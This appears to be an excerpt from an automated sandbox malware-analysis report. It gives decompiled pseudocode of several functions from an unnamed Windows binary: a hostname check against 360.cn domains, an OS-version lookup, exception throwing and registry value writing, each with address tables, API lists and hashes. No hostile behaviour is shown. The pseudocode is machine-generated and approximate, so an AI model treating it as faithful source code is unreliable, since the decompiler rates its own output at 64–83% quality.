							_t27 = E00D00DF1(_t42,  *((intOrPtr*)(_t52 - 0x10)), L"pinst.360.cn");
							asm("sbb eax, eax");
							_t29 =  ~_t27 + 1;
							if(_t50 != 0 || _t29 != 0) {
								_t50 = 1;
							}
							E00C9820F(_t52 - 0x10);
							E00C9820F(_t52 - 0x14);
							_t16 = _t50;
						}
					}
				}
				return E00D01632(_t16);
			}













                                                                                                                                                                                          0x00c9b861
                                                                                                                                                                                          0x00c9b861
                                                                                                                                                                                          0x00c9b861
                                                                                                                                                                                          0x00c9b868
                                                                                                                                                                                          0x00c9b86d
                                                                                                                                                                                          0x00c9b87e
                                                                                                                                                                                          0x00c9b880
                                                                                                                                                                                          0x00c9b882
                                                                                                                                                                                          0x00c9b91e
                                                                                                                                                                                          0x00c9b920
                                                                                                                                                                                          0x00c9b920
                                                                                                                                                                                          0x00c9b888
                                                                                                                                                                                          0x00c9b888
                                                                                                                                                                                          0x00c9b88c
                                                                                                                                                                                          0x00c9b88f
                                                                                                                                                                                          0x00c9b894
                                                                                                                                                                                          0x00c9b8a9
                                                                                                                                                                                          0x00c9b916
                                                                                                                                                                                          0x00c9b919
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b8ab
                                                                                                                                                                                          0x00c9b8ab
                                                                                                                                                                                          0x00c9b8b6
                                                                                                                                                                                          0x00c9b8bb
                                                                                                                                                                                          0x00c9b8bd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9b8bf
                                                                                                                                                                                          0x00c9b8c1
                                                                                                                                                                                          0x00c9b8c2
                                                                                                                                                                                          0x00c9b8c6
                                                                                                                                                                                          0x00c9b8c9
                                                                                                                                                                                          0x00c9b8d6
                                                                                                                                                                                          0x00c9b8e7
                                                                                                                                                                                          0x00c9b8e9
                                                                                                                                                                                          0x00c9b8ea
                                                                                                                                                                                          0x00c9b8f4
                                                                                                                                                                                          0x00c9b8f6
                                                                                                                                                                                          0x00c9b8f9
                                                                                                                                                                                          0x00c9b901
                                                                                                                                                                                          0x00c9b901
                                                                                                                                                                                          0x00c9b905
                                                                                                                                                                                          0x00c9b90d
                                                                                                                                                                                          0x00c9b912
                                                                                                                                                                                          0x00c9b912
                                                                                                                                                                                          0x00c9b8bd
                                                                                                                                                                                          0x00c9b8a9
                                                                                                                                                                                          0x00c9b926

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C9B868
                                                                                                                                                                                            • Part of subcall function 00C9B7A4: __EH_prolog3.LIBCMT ref: 00C9B7AB
                                                                                                                                                                                          • __wcsicoll.LIBCMT ref: 00C9B8A0
                                                                                                                                                                                            • Part of subcall function 00C9B742: __EH_prolog3.LIBCMT ref: 00C9B749
                                                                                                                                                                                          • __wcsicoll.LIBCMT ref: 00C9B8D6
                                                                                                                                                                                          • __wcsicoll.LIBCMT ref: 00C9B8EA
                                                                                                                                                                                            • Part of subcall function 00D00DF1: __wcsicmp_l.LIBCMT ref: 00D00E78
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: H_prolog3__wcsicoll$__wcsicmp_l
                                                                                                                                                                                          • String ID: down.360safe.com$http$pinst.360.cn
                                                                                                                                                                                          • API String ID: 3415884688-1937880844
                                                                                                                                                                                          • Opcode ID: 73cca64268085bc78304c04d27d5eed53678ddc4010852e9d143a91333c83c3c
                                                                                                                                                                                          • Instruction ID: 0acacba026a523ca4fba9f3d91cb41080cfec0b1713ab7d789221980c07ba167
                                                                                                                                                                                          • Opcode Fuzzy Hash: 73cca64268085bc78304c04d27d5eed53678ddc4010852e9d143a91333c83c3c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 09110432E9052AB7CF21A6A8DD5AB7E2625DF51711F000114F815F71D1EF209F09A2B1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C97A07 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 51libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                          			E00C97A07(intOrPtr* __ebx, intOrPtr* __edi) {
				void* __esi;
				signed int _t11;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t14;
				void* _t15;
				intOrPtr* _t26;
				void* _t30;
				intOrPtr* _t31;
				WCHAR* _t33;
				void* _t34;
				signed int _t35;
				void* _t37;

				_t31 = __edi;
				_t26 = __ebx;
				_t35 = _t37 - 0x2a0;
				_t11 =  *0xd64070; // 0x8a9e1774
				 *(_t35 + 0x29c) = _t11 ^ _t35;
				_t33 = L"ntdll.dll";
				_t13 = GetModuleHandleW(_t33);
				if(_t13 != 0) {
					L2:
					 *((intOrPtr*)(_t35 - 0x80)) = 0x114;
					_t14 = GetProcAddress(_t13, "RtlGetVersion");
					if(_t14 == 0) {
						goto L5;
					} else {
						_push(_t35 - 0x80);
						if( *_t14() < 0) {
							goto L5;
						} else {
							 *_t31 =  *((intOrPtr*)(_t35 - 0x7c));
							 *_t26 =  *((intOrPtr*)(_t35 - 0x78));
							_t15 = 1;
						}
					}
				} else {
					GetSystemDirectoryW(_t35 + 0x94, 0x104);
					PathAppendW(_t35 + 0x94, _t33);
					_t13 = LoadLibraryW(_t35 + 0x94);
					if(_t13 == 0) {
						L5:
						_t15 = 0;
					} else {
						goto L2;
					}
				}
				_pop(_t34);
				return E00D0071A(_t15, _t26,  *(_t35 + 0x29c) ^ _t35, _t30, _t31, _t34);
			}















                                                                                                                                                                                          0x00c97a07
                                                                                                                                                                                          0x00c97a07
                                                                                                                                                                                          0x00c97a08
                                                                                                                                                                                          0x00c97a15
                                                                                                                                                                                          0x00c97a1c
                                                                                                                                                                                          0x00c97a23
                                                                                                                                                                                          0x00c97a29
                                                                                                                                                                                          0x00c97a31
                                                                                                                                                                                          0x00c97a64
                                                                                                                                                                                          0x00c97a6a
                                                                                                                                                                                          0x00c97a71
                                                                                                                                                                                          0x00c97a79
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c97a7b
                                                                                                                                                                                          0x00c97a7e
                                                                                                                                                                                          0x00c97a83
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c97a85
                                                                                                                                                                                          0x00c97a88
                                                                                                                                                                                          0x00c97a8d
                                                                                                                                                                                          0x00c97a91
                                                                                                                                                                                          0x00c97a91
                                                                                                                                                                                          0x00c97a83
                                                                                                                                                                                          0x00c97a33
                                                                                                                                                                                          0x00c97a3f
                                                                                                                                                                                          0x00c97a4d
                                                                                                                                                                                          0x00c97a5a
                                                                                                                                                                                          0x00c97a62
                                                                                                                                                                                          0x00c97a94
                                                                                                                                                                                          0x00c97a94
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c97a62
                                                                                                                                                                                          0x00c97a9e
                                                                                                                                                                                          0x00c97aab

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00C97A29
                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00C97A3F
                                                                                                                                                                                          • PathAppendW.SHLWAPI(?,ntdll.dll), ref: 00C97A4D
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 00C97A5A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00C97A71
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressAppendDirectoryHandleLibraryLoadModulePathProcSystem
                                                                                                                                                                                          • String ID: RtlGetVersion$ntdll.dll
                                                                                                                                                                                          • API String ID: 82772770-1489217083
                                                                                                                                                                                          • Opcode ID: 9cac410480f765750ab656e28a83d41f67a293ff964f2c0ef69f459782f1acb6
                                                                                                                                                                                          • Instruction ID: 2fab3c8514a04c38c9e433ded802caf8259855517e8895d12aeac041dea0285f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cac410480f765750ab656e28a83d41f67a293ff964f2c0ef69f459782f1acb6
                                                                                                                                                                                          • Instruction Fuzzy Hash: BF11097172521A9FDB20EFB8EC48BDE77ACAF09304F000569A95AD6250EB74D6059B22
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CFCF1C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                          			E00CFCF1C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v16;
				intOrPtr _v36;
				char _v52;
				char _v92;
				intOrPtr* _t34;
				void* _t35;
				intOrPtr* _t38;

				_push(0x44);
				E00D0155A(0xd38656, __ebx, __edi, __esi);
				E00C8B780( &_v52, "invalid string position");
				_v16 = _v16 & 0x00000000;
				E00CAB60A( &_v92,  &_v52);
				E00D00729( &_v92, 0xd507ec);
				asm("int3");
				_push(0x44);
				E00D0155A(0xd38679, __ebx, __edi, __esi);
				E00C8B780( &_v52, "invalid string argument");
				_v16 = _v16 & 0x00000000;
				_t34 =  &_v92;
				E00CFCE95(_t34,  &_v52);
				E00D00729( &_v92, 0xd5882c);
				asm("int3");
				_push(__esi);
				_t38 = _t34;
				E00C8A6D0(_t35, _v36);
				 *_t38 = 0xd441d4;
				return _t38;
			}










                                                                                                                                                                                          0x00cfcf1c
                                                                                                                                                                                          0x00cfcf23
                                                                                                                                                                                          0x00cfcf30
                                                                                                                                                                                          0x00cfcf35
                                                                                                                                                                                          0x00cfcf40
                                                                                                                                                                                          0x00cfcf4e
                                                                                                                                                                                          0x00cfcf53
                                                                                                                                                                                          0x00cfcf54
                                                                                                                                                                                          0x00cfcf5b
                                                                                                                                                                                          0x00cfcf68
                                                                                                                                                                                          0x00cfcf6d
                                                                                                                                                                                          0x00cfcf75
                                                                                                                                                                                          0x00cfcf78
                                                                                                                                                                                          0x00cfcf86
                                                                                                                                                                                          0x00cfcf8b
                                                                                                                                                                                          0x00cfcf91
                                                                                                                                                                                          0x00cfcf95
                                                                                                                                                                                          0x00cfcf97
                                                                                                                                                                                          0x00cfcf9c
                                                                                                                                                                                          0x00cfcfa6

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00CFCF23
                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00CFCF4E
                                                                                                                                                                                            • Part of subcall function 00D00729: RaiseException.KERNEL32(?,?,?,00C880B1,?,?,?,?,?,00C880B1,00D59760,00D59760), ref: 00D0076B
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00CFCF5B
                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 00CFCF78
                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00CFCF86
                                                                                                                                                                                            • Part of subcall function 00C8A6D0: std::exception::exception.LIBCMT ref: 00C8A6FE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • invalid string argument, xrefs: 00CFCF60
                                                                                                                                                                                          • invalid string position, xrefs: 00CFCF28
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Exception@8H_prolog3Throw$ExceptionRaisestd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                          • String ID: invalid string argument$invalid string position
                                                                                                                                                                                          • API String ID: 3632787552-3740083952
                                                                                                                                                                                          • Opcode ID: 9fc1f4af6054a3d4a66ef2c83a783b72e616851df1e58abbacfd02feb37a2b86
                                                                                                                                                                                          • Instruction ID: 7672eb4d87a24740fc4362c35f32f2de6c7ba32ca61558a77995c6ab31b695c6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fc1f4af6054a3d4a66ef2c83a783b72e616851df1e58abbacfd02feb37a2b86
                                                                                                                                                                                          • Instruction Fuzzy Hash: BB011A7290021CABCB04EAD0CC46BDEBB78EB64362F040425F605AA181DBB49A48DBB4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9A0FD Relevance: 10.7, APIs: 7, Instructions: 241stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                          			E00C9A0FD(intOrPtr __ecx, signed int __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t58;
				char* _t59;
				WCHAR* _t71;
				WCHAR* _t74;
				signed char _t76;
				signed int _t87;
				signed char _t89;
				WCHAR* _t94;
				int _t101;
				WCHAR* _t109;
				intOrPtr _t112;
				void* _t113;
				short _t114;
				int _t116;
				void* _t134;
				signed int _t142;
				signed int _t144;
				void* _t149;
				signed int _t150;
				WCHAR* _t151;
				void* _t155;
				WCHAR* _t156;
				WCHAR* _t158;
				char** _t161;
				void* _t163;
				void* _t167;

				_t167 = __eflags;
				_t144 = __edx;
				_t161 = _t163 - 0x2108;
				E00D00E90(0x2108);
				_push(0xffffffff);
				_push(0xd2ff0b);
				_push( *[fs:0x0]);
				_t58 =  *0xd64070; // 0x8a9e1774
				_t59 = _t58 ^ _t161;
				_t161[0x841] = _t59;
				_push(_t59);
				 *[fs:0x0] = _t161 - 0xc;
				 *((intOrPtr*)(_t161 - 0x10)) = _t163 - 0x1c;
				_t154 = _t161[0x844];
				_t148 = _t161[0x845];
				 *(_t161 - 0x14) =  *(_t161 - 0x14) & 0x00000000;
				 *(_t161 - 0x24) = _t161[0x846];
				_t112 = __ecx;
				 *((intOrPtr*)(_t161 - 0x28)) = __ecx;
				 *(_t161 - 0x1c) = _t161[0x844];
				 *(_t161 - 0x18) = _t161[0x845];
				if(E00C98D7E(__ecx, _t167,  &(_t161[0x41])) < 0) {
					L36:
					 *[fs:0x0] =  *((intOrPtr*)(_t161 - 0xc));
					_pop(_t149);
					_pop(_t155);
					_pop(_t113);
					return E00D0071A(_t63, _t113, _t161[0x841] ^ _t161, _t144, _t149, _t155);
				}
				_push(_t161 - 0x14);
				_push( &(_t161[0x41]));
				if(E00C98C10( &(_t161[0x41]), _t154) != 0) {
					E00C98D5C(_t112, __eflags);
					_t63 = E00C98D7E(_t112, __eflags,  &(_t161[0x41]));
					_t114 = 0;
					__eflags = _t63;
					if(_t63 < 0) {
						goto L36;
					}
					_t71 = ( *(_t161 - 0x14) & 0x0000ffff) - 8;
					__eflags = _t71;
					if(_t71 == 0) {
						_t156 = E00C98A5F(_t154, _t148,  &(_t161[0x41]), 1);
						L32:
						_t114 = 0;
						__eflags = _t156;
						if(__eflags == 0) {
							L34:
							_t63 = E00C98D7E( *((intOrPtr*)(_t161 - 0x28)), __eflags,  *(_t161 - 0x24));
							__eflags = _t63 - _t114;
							if(_t63 >= _t114) {
								_t63 = 0;
								__eflags = 0;
							}
							goto L36;
						}
						_t63 = E00C988C8(_t156);
						goto L36;
					}
					_t74 = _t71 - 9;
					__eflags = _t74;
					if(_t74 == 0) {
						_t76 = lstrlenW( &(_t161[0x41]));
						 *(_t161 - 0x14) = _t76;
						__eflags = _t76 & 0x00000001;
						if((_t76 & 0x00000001) == 0) {
							 *_t161 =  *_t161 & 0x00000000;
							asm("cdq");
							_t116 = _t76 - _t144 >> 1;
							 *(_t161 - 0x20) = _t116;
							 *(_t161 - 4) = 3;
							 *(_t161 - 4) = 4;
							E00C999F1(_t161, _t116);
							_t150 = 0;
							__eflags =  *_t161;
							if( *_t161 != 0) {
								E00D006A0(0,  *_t161, 0, _t116);
								__eflags =  *(_t161 - 0x14);
								if( *(_t161 - 0x14) <= 0) {
									L29:
									_t156 = RegSetValueExW( *( *(_t161 - 0x1c)),  *(_t161 - 0x18), 0, 3,  *_t161, _t116);
									__eflags =  *_t161 -  &(_t161[1]);
									if( *_t161 !=  &(_t161[1])) {
										E00C990A3(_t161);
									}
									goto L32;
								} else {
									goto L28;
								}
								do {
									L28:
									asm("cdq");
									_t87 = _t150 - _t144 >> 1;
									_t89 = E00C98CA4( *(_t161 + 0x104 + _t150 * 2) & 0x0000ffff);
									_t144 = (_t150 & 0x00000001) << 2;
									_t134 = 4;
									( *_t161)[_t87] = ( *_t161)[_t87] | _t89 << _t134 - _t144;
									_t150 = _t150 + 1;
									__eflags = _t150 -  *(_t161 - 0x14);
								} while (_t150 <  *(_t161 - 0x14));
								goto L29;
							} else {
								__eflags =  &(_t161[1]);
								if( &(_t161[1]) != 0) {
									E00C990A3(_t161);
								}
								goto L22;
							}
						}
						L22:
						_t63 = 0x80004005;
						goto L36;
					}
					_t94 = _t74;
					__eflags = _t94;
					if(_t94 == 0) {
						 *(_t161 - 0x1c) = 0;
						__imp__#277( &(_t161[0x41]), 0, 0, _t161 - 0x18);
						_t156 = E00C98A45(_t154, _t148,  *(_t161 - 0x18));
						E00C98F74(_t97, _t161 - 0x1c);
						goto L32;
					}
					__eflags = _t94 - 0x3ff5;
					if(__eflags != 0) {
						goto L34;
					}
					_t101 = lstrlenW( &(_t161[0x41]));
					 *_t161 = 0;
					 *(_t161 - 4) = 0;
					 *(_t161 - 4) = 1;
					E00C999D5(_t161, _t101 + 2);
					_t158 =  *_t161;
					__eflags = _t158;
					if(_t158 == 0) {
						_t156 = 0xe;
						L18:
						__eflags =  *_t161 -  &(_t161[1]);
						if( *_t161 !=  &(_t161[1])) {
							E00C9909A(_t161);
						}
						goto L32;
					}
					__eflags = _t161[0x41];
					_t151 =  &(_t161[0x41]);
					if(_t161[0x41] == 0) {
						L16:
						 *_t158 = 0;
						_t158[1] = 0;
						_t156 = E00C98A96( *(_t161 - 0x1c),  *(_t161 - 0x18),  *_t161);
						goto L18;
					} else {
						do {
							_t109 = CharNextW(_t151);
							_t142 =  *_t151 & 0x0000ffff;
							__eflags = _t142 - 0x5c;
							if(_t142 != 0x5c) {
								L14:
								 *_t158 = _t142;
								_t158 =  &(_t158[1]);
								_t151 =  &(_t151[1]);
								__eflags = _t151;
								goto L15;
							}
							__eflags =  *_t109 - 0x30;
							if( *_t109 != 0x30) {
								goto L14;
							}
							 *_t158 = 0;
							_t158 =  &(_t158[1]);
							_t151 = CharNextW(_t109);
							L15:
							__eflags =  *_t151;
						} while ( *_t151 != 0);
						goto L16;
					}
				} else {
					_t63 = 0x80020009;
					goto L36;
				}
			}

































                                                                                                                                                                                          0x00c9a0fd
                                                                                                                                                                                          0x00c9a0fd
                                                                                                                                                                                          0x00c9a0fe
                                                                                                                                                                                          0x00c9a10a
                                                                                                                                                                                          0x00c9a10f
                                                                                                                                                                                          0x00c9a111
                                                                                                                                                                                          0x00c9a11c
                                                                                                                                                                                          0x00c9a120
                                                                                                                                                                                          0x00c9a125
                                                                                                                                                                                          0x00c9a127
                                                                                                                                                                                          0x00c9a130
                                                                                                                                                                                          0x00c9a134
                                                                                                                                                                                          0x00c9a13a
                                                                                                                                                                                          0x00c9a143
                                                                                                                                                                                          0x00c9a149
                                                                                                                                                                                          0x00c9a14f
                                                                                                                                                                                          0x00c9a153
                                                                                                                                                                                          0x00c9a15c
                                                                                                                                                                                          0x00c9a15f
                                                                                                                                                                                          0x00c9a162
                                                                                                                                                                                          0x00c9a165
                                                                                                                                                                                          0x00c9a16f
                                                                                                                                                                                          0x00c9a3bc
                                                                                                                                                                                          0x00c9a3bf
                                                                                                                                                                                          0x00c9a3c7
                                                                                                                                                                                          0x00c9a3c8
                                                                                                                                                                                          0x00c9a3c9
                                                                                                                                                                                          0x00c9a3de
                                                                                                                                                                                          0x00c9a3de
                                                                                                                                                                                          0x00c9a178
                                                                                                                                                                                          0x00c9a17f
                                                                                                                                                                                          0x00c9a189
                                                                                                                                                                                          0x00c9a197
                                                                                                                                                                                          0x00c9a1a5
                                                                                                                                                                                          0x00c9a1aa
                                                                                                                                                                                          0x00c9a1ac
                                                                                                                                                                                          0x00c9a1ae
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a1b8
                                                                                                                                                                                          0x00c9a1b8
                                                                                                                                                                                          0x00c9a1bb
                                                                                                                                                                                          0x00c9a39a
                                                                                                                                                                                          0x00c9a39c
                                                                                                                                                                                          0x00c9a39c
                                                                                                                                                                                          0x00c9a39e
                                                                                                                                                                                          0x00c9a3a0
                                                                                                                                                                                          0x00c9a3ab
                                                                                                                                                                                          0x00c9a3b1
                                                                                                                                                                                          0x00c9a3b6
                                                                                                                                                                                          0x00c9a3b8
                                                                                                                                                                                          0x00c9a3ba
                                                                                                                                                                                          0x00c9a3ba
                                                                                                                                                                                          0x00c9a3ba
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a3b8
                                                                                                                                                                                          0x00c9a3a3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a3a8
                                                                                                                                                                                          0x00c9a1c1
                                                                                                                                                                                          0x00c9a1c1
                                                                                                                                                                                          0x00c9a1c4
                                                                                                                                                                                          0x00c9a2bd
                                                                                                                                                                                          0x00c9a2c3
                                                                                                                                                                                          0x00c9a2c6
                                                                                                                                                                                          0x00c9a2c8
                                                                                                                                                                                          0x00c9a2d4
                                                                                                                                                                                          0x00c9a2d8
                                                                                                                                                                                          0x00c9a2dd
                                                                                                                                                                                          0x00c9a2df
                                                                                                                                                                                          0x00c9a2e2
                                                                                                                                                                                          0x00c9a2ed
                                                                                                                                                                                          0x00c9a2f1
                                                                                                                                                                                          0x00c9a301
                                                                                                                                                                                          0x00c9a303
                                                                                                                                                                                          0x00c9a306
                                                                                                                                                                                          0x00c9a31e
                                                                                                                                                                                          0x00c9a326
                                                                                                                                                                                          0x00c9a329
                                                                                                                                                                                          0x00c9a35e
                                                                                                                                                                                          0x00c9a375
                                                                                                                                                                                          0x00c9a37a
                                                                                                                                                                                          0x00c9a37d
                                                                                                                                                                                          0x00c9a382
                                                                                                                                                                                          0x00c9a382
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a32b
                                                                                                                                                                                          0x00c9a32b
                                                                                                                                                                                          0x00c9a330
                                                                                                                                                                                          0x00c9a333
                                                                                                                                                                                          0x00c9a341
                                                                                                                                                                                          0x00c9a34c
                                                                                                                                                                                          0x00c9a351
                                                                                                                                                                                          0x00c9a356
                                                                                                                                                                                          0x00c9a358
                                                                                                                                                                                          0x00c9a359
                                                                                                                                                                                          0x00c9a359
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a308
                                                                                                                                                                                          0x00c9a30b
                                                                                                                                                                                          0x00c9a30d
                                                                                                                                                                                          0x00c9a312
                                                                                                                                                                                          0x00c9a312
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a30d
                                                                                                                                                                                          0x00c9a306
                                                                                                                                                                                          0x00c9a2ca
                                                                                                                                                                                          0x00c9a2ca
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a2ca
                                                                                                                                                                                          0x00c9a1cb
                                                                                                                                                                                          0x00c9a1cb
                                                                                                                                                                                          0x00c9a1cc
                                                                                                                                                                                          0x00c9a293
                                                                                                                                                                                          0x00c9a296
                                                                                                                                                                                          0x00c9a2aa
                                                                                                                                                                                          0x00c9a2ac
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a2ac
                                                                                                                                                                                          0x00c9a1d2
                                                                                                                                                                                          0x00c9a1d7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a1e4
                                                                                                                                                                                          0x00c9a1ec
                                                                                                                                                                                          0x00c9a1ef
                                                                                                                                                                                          0x00c9a1f6
                                                                                                                                                                                          0x00c9a1fa
                                                                                                                                                                                          0x00c9a1ff
                                                                                                                                                                                          0x00c9a202
                                                                                                                                                                                          0x00c9a204
                                                                                                                                                                                          0x00c9a26c
                                                                                                                                                                                          0x00c9a26d
                                                                                                                                                                                          0x00c9a270
                                                                                                                                                                                          0x00c9a273
                                                                                                                                                                                          0x00c9a27c
                                                                                                                                                                                          0x00c9a27c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a273
                                                                                                                                                                                          0x00c9a206
                                                                                                                                                                                          0x00c9a20e
                                                                                                                                                                                          0x00c9a214
                                                                                                                                                                                          0x00c9a24f
                                                                                                                                                                                          0x00c9a254
                                                                                                                                                                                          0x00c9a257
                                                                                                                                                                                          0x00c9a266
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a216
                                                                                                                                                                                          0x00c9a21c
                                                                                                                                                                                          0x00c9a21d
                                                                                                                                                                                          0x00c9a21f
                                                                                                                                                                                          0x00c9a222
                                                                                                                                                                                          0x00c9a226
                                                                                                                                                                                          0x00c9a242
                                                                                                                                                                                          0x00c9a242
                                                                                                                                                                                          0x00c9a246
                                                                                                                                                                                          0x00c9a248
                                                                                                                                                                                          0x00c9a248
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a248
                                                                                                                                                                                          0x00c9a228
                                                                                                                                                                                          0x00c9a22c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9a230
                                                                                                                                                                                          0x00c9a235
                                                                                                                                                                                          0x00c9a238
